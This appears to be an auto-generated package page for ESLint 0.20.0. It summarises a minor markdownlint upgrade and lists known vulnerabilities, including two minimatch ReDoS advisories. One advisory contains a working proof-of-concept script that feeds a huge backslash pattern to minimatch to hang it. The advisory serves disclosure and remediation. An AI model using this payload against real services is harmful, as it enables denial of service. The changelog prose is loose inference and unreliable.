ESLint version 0.20.0 brings incremental improvements over its predecessor, version 0.19.0, offering developers a refined experience in JavaScript linting. While maintaining core functionalities like AST-based pattern checking, several subtle yet significant changes cater to evolving development workflows.
A notable difference lies within the development dependencies. Version 0.20.0 sees an upgrade to markdownlint from version 0.0.3 to 0.0.4. This suggests improvements in the tool's ability to validate and enforce consistent Markdown formatting within projects, a valuable enhancement for maintaining documentation quality and consistency. The core runtime dependencies appear unchanged, indicating a focus on stability and refining existing features rather than introducing entirely new functionalities.
For developers using ESLint, upgrading to version 0.20.0 primarily translates to benefiting from enhanced tooling for development workflows. The adjustment to markdownlint specifically highlights a commit to developer experience, streamlining documentation processes. The updated release date also signifies ongoing maintenance and active development, reinforcing ESLint's position as a reliable linter for JavaScript projects. While the changes might seem minor, staying up-to-date ensures compatibility with the latest standards and benefits from iterative improvements to the underlying technology.
All the vulnerabilities related to the version 0.20.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.